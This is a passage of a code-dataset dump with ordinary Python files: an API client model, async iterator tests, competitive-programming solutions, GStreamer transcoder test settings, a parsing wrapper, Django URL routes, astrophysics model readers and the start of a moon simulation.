TypeVar(\"T\", bound=\"ModelCloudNodeAccountRegisterResp\")\n\n\n@_attrs_define\nclass ModelCloudNodeAccountRegisterResp:\n \"\"\"\n Example:\n {'data': {'cloudtrail_trails': [{'account_id': 'account_id', 'trail_name': 'trail_name'}, {'account_id':\n 'account_id', 'trail_name': 'trail_name'}], 'log_action': {'id': 0, 'request_payload': 'request_payload'},\n 'scans': {'key': {'account_id': 'account_id', 'stop_requested': True, 'benchmarks': [{'controls': ['controls',\n 'controls'], 'compliance_type': 'compliance_type', 'id': 'id'}, {'controls': ['controls', 'controls'],\n 'compliance_type': 'compliance_type', 'id': 'id'}], 'scan_id': 'scan_id', 'scan_types': ['scan_types',\n 'scan_types']}}, 'refresh': 'refresh'}}\n\n Attributes:\n data (Union[Unset, ModelCloudNodeAccountRegisterRespData]): Example: {'cloudtrail_trails': [{'account_id':\n 'account_id', 'trail_name': 'trail_name'}, {'account_id': 'account_id', 'trail_name': 'trail_name'}],\n 'log_action': {'id': 0, 'request_payload': 'request_payload'}, 'scans': {'key': {'account_id': 'account_id',\n 'stop_requested': True, 'benchmarks': [{'controls': ['controls', 'controls'], 'compliance_type':\n 'compliance_type', 'id': 'id'}, {'controls': ['controls', 'controls'], 'compliance_type': 'compliance_type',\n 'id': 'id'}], 'scan_id': 'scan_id', 'scan_types': ['scan_types', 'scan_types']}}, 'refresh': 'refresh'}.\n \"\"\"\n\n data: Union[Unset, 
\"ModelCloudNodeAccountRegisterRespData\"] = UNSET\n additional_properties: Dict[str, Any] = _attrs_field(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n data: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.data, Unset):\n data = self.data.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if data is not UNSET:\n field_dict[\"data\"] = data\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.model_cloud_node_account_register_resp_data import ModelCloudNodeAccountRegisterRespData\n\n d = src_dict.copy()\n _data = d.pop(\"data\", UNSET)\n data: Union[Unset, ModelCloudNodeAccountRegisterRespData]\n if isinstance(_data, Unset):\n data = UNSET\n else:\n data = ModelCloudNodeAccountRegisterRespData.from_dict(_data)\n\n model_cloud_node_account_register_resp = cls(\n data=data,\n )\n\n model_cloud_node_account_register_resp.additional_properties = d\n return model_cloud_node_account_register_resp\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"deepfence/threatmapper-python-client","sub_path":"threatmapper/models/model_cloud_node_account_register_resp.py","file_name":"model_cloud_node_account_register_resp.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"15483349235","text":"import unittest\n\n\nfrom aiter import iter_to_aiter, join_aiters, push_aiter\n\n\nfrom .helpers import run, get_n\n\n\nclass test_aitertools(unittest.TestCase):\n\n def test_join_aiters(self):\n int_vals = [1, 2, 3, 4]\n str_vals = \"abcdefg\"\n\n list_of_lists = [int_vals, str_vals]\n iter_of_aiters = [iter_to_aiter(_) for _ in list_of_lists]\n aiter_of_aiters = iter_to_aiter(iter_of_aiters)\n r = run(get_n(join_aiters(aiter_of_aiters)))\n\n r1 = [_ for _ in r if isinstance(_, int)]\n r2 = [_ for _ in r if isinstance(_, str)]\n self.assertEqual(r1, int_vals)\n self.assertEqual(r2, list(str_vals))\n\n def test_join_aiters_1(self):\n # make sure nothing's dropped\n # even if lots of events come in at once\n main_aiter = push_aiter()\n child_aiters = []\n aiter = join_aiters(main_aiter)\n\n child_aiters.append(push_aiter())\n child_aiters[0].push(100)\n main_aiter.push(child_aiters[0])\n\n t = run(get_n(aiter, 1))\n self.assertEqual(t, [100])\n\n child_aiters.append(push_aiter())\n child_aiters[0].push(101)\n child_aiters[1].push(200)\n child_aiters[1].push(201)\n main_aiter.push(child_aiters[1])\n\n t = run(get_n(aiter, 3))\n self.assertEqual(set(t), set([101, 200, 201]))\n\n for _ in range(3):\n child_aiters.append(push_aiter())\n main_aiter.push(child_aiters[-1])\n for _, ca in enumerate(child_aiters):\n ca.push((_+1) * 100)\n ca.push((_+1) * 100 + 1)\n\n t = run(get_n(aiter, len(child_aiters) * 2))\n self.assertEqual(set(t), set([100, 101, 200, 201, 300, 301, 400, 401, 500, 501]))\n\n child_aiters[-1].push(5000)\n main_aiter.stop()\n t = run(get_n(aiter, 1))\n self.assertEqual(t, [5000])\n\n for ca in child_aiters:\n ca.push(99)\n 
ca.stop()\n t = run(get_n(aiter))\n self.assertEqual(t, [99] * len(child_aiters))\n","repo_name":"richardkiss/aiter","sub_path":"tests/test_join_aiters.py","file_name":"test_join_aiters.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"21730530053","text":"#1613 Floyd-Warshall (Gold 3)\n#submitted with pypy3\n#Floyd-Warshall: a->b, b->c : a->c\n\nimport sys\ninput = sys.stdin.readline\n\nn, k = map(int, input().split()) #n = number of events\ngraph = [[0] * n for _ in range(n)]\nseek = []\n\nfor _ in range(k):\n a, b = map(int, input().split()) #a happens before b\n graph[a-1][b-1] = 1\n\ns = int(input()) #relations to query\nfor _ in range(s):\n a, b = map(int, input().split())\n seek.append([a-1, b-1])\n\n#via, from, to\nfor j in range(n):\n for i in range(n):\n for k in range(n):\n if graph[i][j] and graph[j][k]:\n graph[i][k] = 1\n\nfor a, b in seek:\n if graph[a][b]:\n print(-1)\n elif graph[b][a]:\n print(1)\n else:\n print(0)","repo_name":"hanjaegyeong/algorithm","sub_path":"baekjoon/1613_플로이드워셜(골드3).py","file_name":"1613_플로이드워셜(골드3).py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73286894390","text":"import os\nimport slash\n\nfrom ....lib import platform\nfrom ....lib.common import get_media\nfrom ....lib.gstreamer.transcoderbase import BaseTranscoderTest\nfrom ....lib.gstreamer.util import have_gst_element\n\n@slash.requires(*have_gst_element(\"vaapi\"))\nclass TranscoderTest(BaseTranscoderTest):\n requirements = dict(\n decode = {\n \"avc\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"openh264dec\"), \"h264parse ! openh264dec ! videoconvert\"),\n hw = (platform.get_caps(\"decode\", \"avc\"), have_gst_element(\"vaapih264dec\"), \"h264parse ! vaapih264dec\"),\n ),\n \"hevc-8\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"libde265dec\"), \"h265parse ! libde265dec ! videoconvert\"),\n hw = (platform.get_caps(\"decode\", \"hevc_8\"), have_gst_element(\"vaapih265dec\"), \"h265parse ! vaapih265dec\"),\n ),\n \"mpeg2\" : dict(\n sw = (dict(maxres = (2048, 2048)), have_gst_element(\"mpeg2dec\"), \"mpegvideoparse ! mpeg2dec ! videoconvert\"),\n hw = (platform.get_caps(\"decode\", \"mpeg2\"), have_gst_element(\"vaapimpeg2dec\"), \"mpegvideoparse ! vaapimpeg2dec\"),\n ),\n \"mjpeg\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"jpegdec\"), \"jpegparse ! jpegdec\"),\n hw = (platform.get_caps(\"decode\", \"jpeg\"), have_gst_element(\"vaapijpegdec\"), \"jpegparse ! vaapijpegdec\"),\n ),\n \"vc1\" : dict(\n sw = (\n dict(maxres = (16384, 16384)), have_gst_element(\"avdec_vc1\"),\n \"'video/x-wmv,profile=(string)advanced'\"\n \",width={width},height={height},framerate=14/1 ! avdec_vc1\"\n ),\n hw = (\n platform.get_caps(\"decode\", \"vc1\"), have_gst_element(\"vaapivc1dec\"),\n \"'video/x-wmv,profile=(string)advanced'\"\n \",width={width},height={height},framerate=14/1 ! vaapivc1dec\"\n ),\n ),\n },\n encode = {\n \"avc\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"x264enc\"), \"x264enc ! video/x-h264,profile=main ! h264parse\"),\n hw = (platform.get_caps(\"encode\", \"avc\"), have_gst_element(\"vaapih264enc\"), \"vaapih264enc ! video/x-h264,profile=main ! h264parse\"),\n lp = (platform.get_caps(\"vdenc\", \"avc\"), have_gst_element(\"vaapih264enc\"), \"vaapih264enc rate-control=cqp tune=low-power ! video/x-h264,profile=main ! 
h264parse\"),\n ),\n \"hevc-8\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"x265enc\"), \"videoconvert chroma-mode=none dither=0 ! video/x-raw,format=I420 ! x265enc ! video/x-h265,profile=main ! h265parse\"),\n hw = (platform.get_caps(\"encode\", \"hevc_8\"), have_gst_element(\"vaapih265enc\"), \"vaapih265enc ! video/x-h265,profile=main ! h265parse\"),\n lp = (platform.get_caps(\"vdenc\", \"hevc_8\"), have_gst_element(\"vaapih265enc\"), \"vaapih265enc tune=low-power ! video/x-h265,profile=main ! h265parse\"),\n ),\n \"mpeg2\" : dict(\n sw = (dict(maxres = (2048, 2048)), have_gst_element(\"avenc_mpeg2video\"), \"avenc_mpeg2video ! mpegvideoparse\"),\n hw = (platform.get_caps(\"encode\", \"mpeg2\"), have_gst_element(\"vaapimpeg2enc\"), \"vaapimpeg2enc ! mpegvideoparse\"),\n ),\n \"mjpeg\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"jpegenc\"), \"jpegenc ! jpegparse\"),\n hw = (platform.get_caps(\"vdenc\", \"jpeg\"), have_gst_element(\"vaapijpegenc\"), \"vaapijpegenc ! jpegparse\"),\n ),\n },\n vpp = {\n \"scale\" : dict(\n sw = (True, have_gst_element(\"videoscale\"), \"videoscale ! video/x-raw,width={width},height={height}\"),\n hw = (platform.get_caps(\"vpp\", \"scale\"), have_gst_element(\"vaapipostproc\"), \"vaapipostproc ! video/x-raw,width={width},height={height}\"),\n lp = (platform.get_caps(\"vpp\", \"scale\"), have_gst_element(\"vaapipostproc\"), \"vaapipostproc ! video/x-raw,width={width},height={height}\"),\n ),\n },\n )\n\n # hevc implies hevc 8 bit\n requirements[\"encode\"][\"hevc\"] = requirements[\"encode\"][\"hevc-8\"]\n requirements[\"decode\"][\"hevc\"] = requirements[\"decode\"][\"hevc-8\"]\n\n def before(self):\n super().before()\n os.environ[\"GST_VAAPI_DRM_DEVICE\"] = get_media().render_device\n","repo_name":"intel/vaapi-fits","sub_path":"lib/gstreamer/vaapi/transcoder.py","file_name":"transcoder.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"94"} +{"seq_id":"5218833868","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport os\n\nfrom nltk.data import find\nfrom bllipparser import RerankingParser\n\nfrom nltk.tree import Tree\nfrom nltk import data\n\n\n#import spacy\n#from stanfordcorenlp import StanfordCoreNLP\n#import logging\n#from nltk.parse import CoreNLPParser\n#from pycorenlp import StanfordCoreNLP\n\n#Other interesting tree parser pt & en: https://github.com/Lynten/stanford-corenlp\n\nclass Sintaxe:\n\n def __init__(self, lang='pt-pt'):\n if lang=='pt-pt' or lang=='por':\n self.lang = 'pt'\n else:\n self.lang = 'en'\n \n self.lang = lang\n\n #self.text = ''\n self.parser = self.load_parser()\n self.tree = None\n\n def generate(self, text):\n parsed = self.parse(text)\n tree = Tree.fromstring(parsed)\n self.tree = tree\n return tree\n\n def parse(self, text):\n return self.parser.simple_parse(text)\n\n def load_parser(self):\n nltk_data = os.path.join('data', 'nltk_data')\n model = os.path.join(nltk_data, 'models', 'bllip_wsj_no_aux')\n return RerankingParser.from_unified_model_dir(model)\n\n def draw(self, tree=None):\n if tree:\n tree.draw()\n else:\n self.tree.draw()\n\n\n def printTree(self, tree=None):\n if tree:\n tree.pretty_print()\n else:\n self.tree.pretty_print()\n\nif __name__ == '__main__':\n main = Sintaxe('I am testing this new system.', lang='en')\n print(repr(main.tree))\n #main.printTree()\n 
#main.draw()\n","repo_name":"Paulo-Jorge-PM/text-ide-kivy","sub_path":"app/core/sintaxe.py","file_name":"sintaxe.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"16197772891","text":"import io\nimport sys\n\n# input here\n_INPUT = \"\"\"\\\n62\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n\n\nimport sys\n\nS = input()\n\nif len(S) == 1:\n if int(S) % 8 == 0:\n print('Yes')\n else:\n print('No')\nelif len(S) == 2:\n if int(S) % 8 == 0 or int(S[1] + S[0]) % 8 == 0:\n print('Yes')\n else:\n print('No')\nelse:\n eights = []\n for i in range(1000):\n if i % 8 == 0:\n t = []\n for j in range(3):\n t.append(i % 10)\n i //= 10\n eights.append(t)\n l = [0] * 10\n for i in range(len(S)):\n l[int(S[i])] += 1\n for i in range(len(eights)):\n l2 = [0] * 10\n for j in range(3):\n l2[eights[i][j]] += 1\n flag = True\n for j in range(10):\n if l[j] < l2[j]:\n flag = False\n if flag:\n print('Yes')\n sys.exit()\n\n print('No')\n","repo_name":"n-nooobu/atcoder","sub_path":"abc181/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1551244880","text":"from knock41 import get_chunk_list\n\nfor line in get_chunk_list():\n for chunk in line:\n if chunk.check_pos('動詞'):\n predicate = chunk.get_surfaces('pos', '動詞')[0]\n \n avs = []\n for src in chunk.srcs:\n if len(line[src].get_surfaces('pos', '助詞')) > 0:\n avs.append(line[src].get_surfaces('pos', '助詞').pop())\n \n if avs:\n avs = ' '.join(sorted(avs))\n print(f'{predicate}\\t{avs}')\n \n\n# sort result45 | uniq -c | sort -n -r > result45_unix\n# grep \"^する\" result45 | sort | uniq -c | sort -n -r > する\n# grep \"^見る\" result45 | sort | uniq -c | sort -n -r > 見る\n# grep \"^与える\" result45 | sort | uniq -c | sort -n -r > 与える\n","repo_name":"kokeman/NLP100knock","sub_path":"chapter05/knock45.py","file_name":"knock45.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73952725748","text":"from __future__ import unicode_literals\n\nfrom django.conf.urls import url\n\nfrom . 
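The ABC181 D solution above rests on the fact that a decimal number is divisible by 8 exactly when its last three digits are, so for inputs longer than two digits it only needs to check whether some three-digit multiple of 8 (allowing leading zeros) can be assembled from the available digits. A compact restatement of that check:

from collections import Counter

def can_permute_to_multiple_of_8(s):
    if len(s) <= 2:
        return any(int(p) % 8 == 0 for p in {s, s[::-1]})
    digits = Counter(s)
    for m in range(0, 1000, 8):                   # multiples of 8, zero-padded to 3 digits
        if all(digits[d] >= c for d, c in Counter("%03d" % m).items()):
            return True
    return False

assert can_permute_to_multiple_of_8("62") is False        # 26 and 62 both fail
assert can_permute_to_multiple_of_8("123456789") is True  # e.g. ...128 works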
import views\n\napp_name = 'blog'\n\nurlpatterns = [\n url(r'^$', views.articles, name='articles'),\n url(r'^tag/(?P[a-zа-я]+)/$', views.tag_sort, name='tag'),\n url(r'^author/(?P\\w+)/$', views.author_articles, name='author_articles'),\n url(r'^create/$', views.create_article, name='create_article'),\n url(r'^edit/(?P\\w+)/$', views.EditArticle.as_view(), name='edit_article'),\n url(r'^delete/(?P\\w+)/$', views.delete_article,\n name='delete_article'),\n url(r'^(?P\\w+)/$', views.article, name='article')\n]\n","repo_name":"DudkinON/web-zoomer","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5147578376","text":"#reading different model files\n\nimport warnings\nimport numpy as np\nfrom numpy import recfromtxt, genfromtxt\nimport pandas as pd\nfrom astropy import units as u\nfrom pyne import nucname\n\nimport logging\n# Adding logging support\nlogger = logging.getLogger(__name__)\n\nfrom tardis.util.base import parse_quantity\n\n\nclass ConfigurationError(Exception):\n pass\n\n\ndef read_density_file(filename, filetype):\n \"\"\"\n read different density file formats\n\n Parameters\n ----------\n\n filename: ~str\n filename or path of the density file\n\n filetype: ~str\n type of the density file\n\n Returns\n -------\n time_of_model: ~astropy.units.Quantity\n time at which the model is valid\n\n velocity: ~np.ndarray\n the array containing the velocities\n\n unscaled_mean_densities: ~np.ndarray\n the array containing the densities\n\n \"\"\"\n file_parsers = {'artis': read_artis_density,\n 'simple_ascii': read_simple_ascii_density,\n 'cmfgen_model': read_cmfgen_density}\n\n electron_densities = None\n temperature = None\n if filetype == 'cmfgen_model':\n (time_of_model, velocity,\n unscaled_mean_densities, electron_densities, temperature) = read_cmfgen_density(filename)\n else:\n (time_of_model, velocity,\n unscaled_mean_densities) = file_parsers[filetype](filename)\n\n v_inner = velocity[:-1]\n v_outer = velocity[1:]\n\n invalid_volume_mask = (v_outer - v_inner) <= 0\n if invalid_volume_mask.sum() > 0:\n message = \"\\n\".join([\"cell {0:d}: v_inner {1:s}, v_outer \"\n \"{2:s}\".format(i, v_inner_i, v_outer_i) for i,\n v_inner_i, v_outer_i in\n zip(np.arange(len(v_outer))[invalid_volume_mask],\n v_inner[invalid_volume_mask],\n v_outer[invalid_volume_mask])])\n raise ConfigurationError(\"Invalid volume of following cell(s):\\n\"\n \"{:s}\".format(message))\n\n return time_of_model, velocity, unscaled_mean_densities, electron_densities, temperature\n\ndef read_abundances_file(abundance_filename, abundance_filetype,\n inner_boundary_index=None, outer_boundary_index=None):\n \"\"\"\n read different density file formats\n\n Parameters\n ----------\n\n abundance_filename: ~str\n filename or path of the density file\n\n abundance_filetype: ~str\n type of the density file\n\n inner_boundary_index: int\n index of the inner shell, default None\n\n outer_boundary_index: int\n index of the outer shell, default None\n\n\n \"\"\"\n\n file_parsers = {'simple_ascii': read_simple_ascii_abundances,\n 'artis': read_simple_ascii_abundances,\n 'cmfgen_model': read_cmfgen_composition,\n 'custom_composition': read_csv_composition}\n\n isotope_abundance = pd.DataFrame()\n if abundance_filetype in [\"cmfgen_model\", \"custom_composition\"]:\n index, abundances, isotope_abundance = file_parsers[abundance_filetype](\n abundance_filename)\n else:\n index, abundances = 
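With app_name = 'blog' these routes are namespaced, so the rest of the project refers to them as blog:<name>. A small usage sketch; it assumes this module is wired into the root URLconf with include(), and positional arguments are used because the capture-group names are not visible in this snippet:

from django.urls import reverse

reverse("blog:articles")               # the article list
reverse("blog:article", args=["42"])   # detail view; "42" is an illustrative id
reverse("blog:tag", args=["python"])   # articles filtered by tag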
file_parsers[abundance_filetype](\n abundance_filename)\n\n if outer_boundary_index is not None:\n outer_boundary_index_m1 = outer_boundary_index - 1\n else:\n outer_boundary_index_m1 = None\n index = index[inner_boundary_index:outer_boundary_index]\n abundances = abundances.loc[:, slice(inner_boundary_index, outer_boundary_index_m1)]\n abundances.columns = np.arange(len(abundances.columns))\n return index, abundances, isotope_abundance\n\n\ndef read_uniform_abundances(abundances_section, no_of_shells):\n \"\"\"\n Parameters\n ----------\n\n abundances_section: ~config.model.abundances\n no_of_shells: int\n\n Returns\n -------\n abundance: ~pandas.DataFrame\n isotope_abundance: ~pandas.DataFrame\n \"\"\"\n abundance = pd.DataFrame(columns=np.arange(no_of_shells),\n index=pd.Index(np.arange(1, 120),\n name='atomic_number'),\n dtype=np.float64)\n\n isotope_index = pd.MultiIndex(\n [[]] * 2, [[]] * 2, names=['atomic_number', 'mass_number'])\n isotope_abundance = pd.DataFrame(columns=np.arange(no_of_shells),\n index=isotope_index,\n dtype=np.float64)\n\n for element_symbol_string in abundances_section:\n if element_symbol_string == 'type':\n continue\n try:\n if element_symbol_string in nucname.name_zz:\n z = nucname.name_zz[element_symbol_string]\n abundance.loc[z] = float(\n abundances_section[element_symbol_string])\n else:\n mass_no = nucname.anum(element_symbol_string)\n z = nucname.znum(element_symbol_string)\n isotope_abundance.loc[(z, mass_no), :] = float(\n abundances_section[element_symbol_string])\n\n except RuntimeError as err:\n raise RuntimeError(\n \"Abundances are not defined properly in config file : {}\".format(err.args))\n\n return abundance, isotope_abundance\n\ndef read_simple_ascii_density(fname):\n \"\"\"\n Reading a density file of the following structure (example; lines starting with a hash will be ignored):\n The first density describes the mean density in the center of the model and is not used.\n 5 s\n #index velocity [km/s] density [g/cm^3]\n 0 1.1e4 1.6e8\n 1 1.2e4 1.7e8\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n\n Returns\n -------\n\n time_of_model: ~astropy.units.Quantity\n time at which the model is valid\n\n data: ~pandas.DataFrame\n data frame containing index, velocity (in km/s) and density\n \"\"\"\n\n with open(fname) as fh:\n time_of_model_string = fh.readline().strip()\n time_of_model = parse_quantity(time_of_model_string)\n\n data = recfromtxt(fname, skip_header=1,\n names=('index', 'velocity', 'density'),\n dtype=(int, float, float))\n velocity = (data['velocity'] * u.km / u.s).to('cm/s')\n mean_density = (data['density'] * u.Unit('g/cm^3'))[1:]\n\n return time_of_model, velocity, mean_density\n\ndef read_artis_density(fname):\n \"\"\"\n Reading a density file of the following structure (example; lines starting with a hash will be ignored):\n The first density describes the mean density in the center of the model and is not used.\n 5\n #index velocity [km/s] log10(density) [log10(g/cm^3)]\n 0 1.1e4 1.6e8\n 1 1.2e4 1.7e8\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n\n Returns\n -------\n\n time_of_model: ~astropy.units.Quantity\n time at which the model is valid\n\n data: ~pandas.DataFrame\n data frame containing index, velocity (in km/s) and density\n \"\"\"\n\n with open(fname) as fh:\n for i, line in enumerate(open(fname)):\n if i == 0:\n no_of_shells = np.int64(line.strip())\n elif i == 1:\n time_of_model = u.Quantity(float(line.strip()), 'day').to('s')\n elif i == 2:\n 
break\n\n artis_model_columns = ['index', 'velocities', 'mean_densities_0', 'ni56_fraction', 'co56_fraction', 'fe52_fraction',\n 'cr48_fraction']\n artis_model = recfromtxt(fname, skip_header=2, usecols=(0, 1, 2, 4, 5, 6, 7), unpack=True,\n dtype=[(item, np.float64) for item in artis_model_columns])\n\n\n velocity = u.Quantity(artis_model['velocities'], 'km/s').to('cm/s')\n mean_density = u.Quantity(10 ** artis_model['mean_densities_0'], 'g/cm^3')[1:]\n\n return time_of_model, velocity, mean_density\n\n\ndef read_cmfgen_density(fname):\n \"\"\"\n Reading a density file of the following structure (example; lines starting with a hash will be ignored):\n The first density describes the mean density in the center of the model and is not used.\n The file consists of a header row and next row contains unit of the respective attributes\n Note that the first column has to contain a running index\n\n Example:\n\n index velocity densities electron_densities temperature\n - km/s g/cm^3 /cm^3 K\n 0 871.66905 4.2537191e-09 2.5953807e+14 7.6395577\n 1 877.44269 4.2537191e-09 2.5953807e+14 7.6395577\n\n Rest columns contain abundances of elements and isotopes\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n\n Returns\n -------\n\n time_of_model: ~astropy.units.Quantity\n time at which the model is valid\n\n velocity: ~np.ndarray\n mean_density: ~np.ndarray\n electron_densities: ~np.ndarray\n temperature: ~np.ndarray\n\n \"\"\"\n warnings.warn(\"The current CMFGEN model parser is deprecated\",\n DeprecationWarning)\n\n df = pd.read_csv(fname, comment='#', delimiter=r'\\s+', skiprows=[0, 2])\n\n with open(fname) as fh:\n for row_index, line in enumerate(fh):\n if row_index == 0:\n time_of_model_string = line.strip().replace('t0:', '')\n time_of_model = parse_quantity(time_of_model_string)\n elif row_index == 2:\n quantities = line.split()\n\n velocity = u.Quantity(df['velocity'].values, quantities[1]).to('cm/s')\n temperature = u.Quantity(df['temperature'].values, quantities[2])[1:]\n mean_density = u.Quantity(df['densities'].values, quantities[3])[1:]\n electron_densities = u.Quantity(\n df['electron_densities'].values, quantities[4])[1:]\n\n return time_of_model, velocity, mean_density, electron_densities, temperature\n\ndef read_simple_ascii_abundances(fname):\n \"\"\"\n Reading an abundance file of the following structure (example; lines starting with hash will be ignored):\n The first line of abundances describe the abundances in the center of the model and are not used.\n #index element1, element2, ..., element30\n 0 0.4 0.3, .. 
0.2\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n Returns\n -------\n\n index: ~np.ndarray\n containing the indices\n\n abundances: ~pandas.DataFrame\n data frame containing index, element1 - element30 and columns according to the shells\n \"\"\"\n data = np.loadtxt(fname)\n\n index = data[1:,0].astype(int)\n abundances = pd.DataFrame(data[1:,1:].transpose(), index=np.arange(1, data.shape[1]))\n\n return index, abundances\n\n\ndef read_cmfgen_composition(fname, delimiter=r'\\s+'):\n \"\"\"Read composition from a CMFGEN model file\n\n The CMFGEN file format contains information about the ejecta state in the\n first four columns and the following ones contain elemental and isotopic\n abundances.\n\n WARNING: deprecated\n\n fname: str\n filename of the csv file\n \"\"\"\n\n warnings.warn(\"The current CMFGEN model parser is deprecated\",\n DeprecationWarning)\n\n return read_csv_isotope_abundances(fname, delimiter=delimiter,\n skip_columns=4, skip_rows=[0, 2, 3])\n\n\ndef read_csv_composition(fname, delimiter=r'\\s+'):\n \"\"\"Read composition from a simple CSV file\n\n The CSV file can contain specific isotopes or elemental abundances in the\n different columns. The first row must contain the header in which the\n contents of each column is specified by the elemental symbol (for elemental\n abundances) or by the symbol plus mass number (for isotopic abundances).\n\n Example: C O Fe Ni56 Co\n\n The i-th row specifies the composition in the i-th shell\n\n fname: str\n filename of the csv file\n \"\"\"\n\n return read_csv_isotope_abundances(fname, delimiter=delimiter,\n skip_columns=0, skip_rows=[1])\n\n\ndef read_csv_isotope_abundances(fname, delimiter=r'\\s+', skip_columns=0,\n skip_rows=[1]):\n \"\"\"\n A generic parser for a TARDIS composition stored as a CSV file\n\n The parser can read in both elemental and isotopic abundances. The first\n column is always expected to contain a running index, labelling the grid\n cells. The parser also allows for additional information to be stored in\n the first skip_columns columns. 
These will be ignored if skip_columns > 0.\n Note that the first column, containing the cell index is not taken into\n account here.\n\n Specific header lines can be skipped by the skip_rows keyword argument\n\n It is expected that the first row of the date block (after skipping the\n rows specified in skip_rows) specifies the different elements and isotopes.\n Each row after contains the composition in the corresponding grid shell.\n The first composition row describes the composition of the photosphere and\n is essentially ignored (for the default value of skip_rows).\n\n Example:\n\n Index C O Ni56\n 0 1 1 1\n 1 0.4 0.3 0.2\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n Returns\n -------\n\n index: ~np.ndarray\n abundances: ~pandas.DataFrame\n isotope_abundance: ~pandas.MultiIndex\n \"\"\"\n\n df = pd.read_csv(fname, comment='#',\n sep=delimiter, skiprows=skip_rows, index_col=0)\n df = df.transpose()\n\n abundance = pd.DataFrame(columns=np.arange(df.shape[1]),\n index=pd.Index([],\n name='atomic_number'),\n dtype=np.float64)\n\n isotope_index = pd.MultiIndex(\n [[]] * 2, [[]] * 2, names=['atomic_number', 'mass_number'])\n isotope_abundance = pd.DataFrame(columns=np.arange(df.shape[1]),\n index=isotope_index,\n dtype=np.float64)\n\n for element_symbol_string in df.index[skip_columns:]:\n if element_symbol_string in nucname.name_zz:\n z = nucname.name_zz[element_symbol_string]\n abundance.loc[z, :] = df.loc[element_symbol_string].tolist()\n else:\n z = nucname.znum(element_symbol_string)\n mass_no = nucname.anum(element_symbol_string)\n isotope_abundance.loc[(\n z, mass_no), :] = df.loc[element_symbol_string].tolist()\n\n return abundance.index, abundance, isotope_abundance\n\ndef parse_csv_abundances(csvy_data):\n \"\"\"\n A parser for the csv data part of a csvy model file. 
This function filters out columns that are not abundances.\n\n Parameters\n ----------\n\n csvy_data : pandas.DataFrame\n\n Returns\n -------\n\n index : ~np.ndarray\n abundances : ~pandas.DataFrame\n isotope_abundance : ~pandas.MultiIndex\n \"\"\"\n\n abundance_col_names = [name for name in csvy_data.columns if nucname.iselement(name) or nucname.isnuclide(name)]\n df = csvy_data.loc[:, abundance_col_names]\n \n df = df.transpose()\n\n abundance = pd.DataFrame(columns=np.arange(df.shape[1]),\n index=pd.Index([],\n name='atomic_number'),\n dtype=np.float64)\n\n isotope_index = pd.MultiIndex(\n [[]] * 2, [[]] * 2, names=['atomic_number', 'mass_number'])\n isotope_abundance = pd.DataFrame(columns=np.arange(df.shape[1]),\n index=isotope_index,\n dtype=np.float64)\n\n for element_symbol_string in df.index[0:]:\n if element_symbol_string in nucname.name_zz:\n z = nucname.name_zz[element_symbol_string]\n abundance.loc[z, :] = df.loc[element_symbol_string].tolist()\n else:\n z = nucname.znum(element_symbol_string)\n mass_no = nucname.anum(element_symbol_string)\n isotope_abundance.loc[(\n z, mass_no), :] = df.loc[element_symbol_string].tolist()\n\n return abundance.index, abundance, isotope_abundance\n","repo_name":"svineet/tardis-examples","sub_path":"tardis/io/model_reader.py","file_name":"model_reader.py","file_ext":"py","file_size_in_byte":16060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"74642983668","text":"#!/usr/bin/python3\n\nimport argparse\nimport re\n\n# Parse command-line arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--verbose\", help=\"More output\", action=\"store_true\")\nparser.add_argument(\"--steps\", help=\"Target number of steps\", type=int)\nparser.add_argument(\"filename\", help=\"Star Map\")\nargs = parser.parse_args()\n\nclass Moon:\n def __init__(self, x, y, z):\n self.p = [x,y,z]\n self.v = [0,0,0]\n\n def step(self):\n for axis in range(3):\n self.p[axis] += self.v[axis]\n\n def energy(self):\n potential = 0\n kinetic = 0\n for axis in 